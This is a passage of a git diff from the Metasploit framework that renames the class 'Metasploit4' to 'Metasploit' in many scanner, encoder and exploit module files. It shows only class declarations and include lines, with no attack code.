Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index fb132e01e5..b410a07c29 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL diff --git a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb index a9ae93a81b..03bbc52bbf 100644 --- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb +++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb index 3892db3191..1367d64f29 100644 --- a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb +++ b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_delete_file.rb b/modules/auxiliary/scanner/printer/printer_delete_file.rb index 4b561b4877..8f792bd949 100644 --- a/modules/auxiliary/scanner/printer/printer_delete_file.rb +++ b/modules/auxiliary/scanner/printer/printer_delete_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_download_file.rb b/modules/auxiliary/scanner/printer/printer_download_file.rb index 64c04d999d..6a939e0754 100644 --- a/modules/auxiliary/scanner/printer/printer_download_file.rb +++ b/modules/auxiliary/scanner/printer/printer_download_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_env_vars.rb b/modules/auxiliary/scanner/printer/printer_env_vars.rb index c1546ccb66..e669a4e1d3 100644 --- a/modules/auxiliary/scanner/printer/printer_env_vars.rb +++ b/modules/auxiliary/scanner/printer/printer_env_vars.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_dir.rb b/modules/auxiliary/scanner/printer/printer_list_dir.rb index 49f70ec717..9eca053e18 100644 --- a/modules/auxiliary/scanner/printer/printer_list_dir.rb +++ b/modules/auxiliary/scanner/printer/printer_list_dir.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_volumes.rb b/modules/auxiliary/scanner/printer/printer_list_volumes.rb index d596504844..f567415532 100644 --- a/modules/auxiliary/scanner/printer/printer_list_volumes.rb +++ b/modules/auxiliary/scanner/printer/printer_list_volumes.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_ready_message.rb b/modules/auxiliary/scanner/printer/printer_ready_message.rb index 610a1f6bb4..7d7b54822e 100644 --- a/modules/auxiliary/scanner/printer/printer_ready_message.rb +++ b/modules/auxiliary/scanner/printer/printer_ready_message.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_upload_file.rb b/modules/auxiliary/scanner/printer/printer_upload_file.rb index 3f0fe0229e..a18d15e72e 100644 --- a/modules/auxiliary/scanner/printer/printer_upload_file.rb +++ b/modules/auxiliary/scanner/printer/printer_upload_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_version_info.rb b/modules/auxiliary/scanner/printer/printer_version_info.rb index 5171a46a3c..03c2adb4d7 100644 --- a/modules/auxiliary/scanner/printer/printer_version_info.rb +++ b/modules/auxiliary/scanner/printer/printer_version_info.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb index 3bff4eaa56..112bd4266f 100644 --- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb +++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb index 7865397e71..a88b514c3d 100644 --- a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb +++ b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb index 05ca2b7f4c..a283d565e3 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index f87e2d65f3..c1a8bd9a7f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index 57af398132..506411e9db 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index b1d033363b..f11d403fae 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index 1333c69ff8..f8f9fa0018 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index 15868dd886..f8127748a3 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb index ccf26867ad..f1aa17228d 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb index d48d7dfd8b..9d0d933a4a 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index a6027450f4..bc5d3ba6f2 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index bb443cf0b6..b44330f24c 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index f950718dba..32a92d5387 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 43a943d552..2756ce83fc 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index 34c51c9eba..d760185468 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index c87f04e5b8..ad2ef9bad0 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb index fa77142694..ae5f7ed1fb 100644 --- a/modules/auxiliary/scanner/sap/sap_service_discovery.rb +++ b/modules/auxiliary/scanner/sap/sap_service_discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_smb_relay.rb b/modules/auxiliary/scanner/sap/sap_smb_relay.rb index 3c832996bf..ca521bb97f 100644 --- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb +++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 1ae343ea5b..b18d9c76cf 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index 1febb6b023..64135865da 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index cd8e52f1ee..ac74196cfc 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index 05bbe78ec4..15e11857ec 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb index 1658e8688d..cb79ecae27 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb index 1547c002aa..c6dfdfa751 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index 95a48c4de8..9032be1236 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index f699e19db8..52d0d11387 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb index e751c8e3cb..8214594b4a 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb @@ -23,7 +23,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index 833901c516..eea01d13b5 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 0091f41be4..7791284890 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 0480f0b23d..1647597cf4 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 5cfe258ca9..466e3eb83c 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index a9400633cf..c6566154cb 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -16,7 +16,7 @@ require "msf/core" -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb index ebac99fd8b..e5283dd1ed 100644 --- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb index 6b8acd99f2..5cbca1ad22 100644 --- a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/detect_kippo.rb b/modules/auxiliary/scanner/ssh/detect_kippo.rb index 1b1371675c..1ea753e6ea 100644 --- a/modules/auxiliary/scanner/ssh/detect_kippo.rb +++ b/modules/auxiliary/scanner/ssh/detect_kippo.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 71e0077f44..358432d748 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Fortinet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb index c5beadbe05..0d8891f8ba 100644 --- a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb +++ b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb index 061b3b1c10..325d886922 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/auxiliary/server/tnftp_savefile.rb index 26e4894234..834bd1460b 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/auxiliary/server/tnftp_savefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report diff --git a/modules/encoders/x86/bmp_polyglot.rb b/modules/encoders/x86/bmp_polyglot.rb index 6c834132f4..b1683b1650 100644 --- a/modules/encoders/x86/bmp_polyglot.rb +++ b/modules/encoders/x86/bmp_polyglot.rb @@ -177,7 +177,7 @@ class SizeCalculator end -class Metasploit4 < Msf::Encoder +class Metasploit < Msf::Encoder Rank = ManualRanking diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index 18f91d7ec9..d0b4e08782 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index 204bf8af5b..cfc61dd287 100644 --- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb index 6a352d7bab..1213690e49 100644 --- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb +++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb index e16a64a85c..ee76fa96e0 100644 --- a/modules/exploits/freebsd/local/mmap.rb +++ b/modules/exploits/freebsd/local/mmap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb index aa6f165b1b..ddb7d72ceb 100644 --- a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb +++ b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local # It needs 3 minutes wait time # WfsDelay set to 180, so it should be a Manual exploit, # to avoid it being included in automations diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index cfc944d929..e7bbc53312 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb 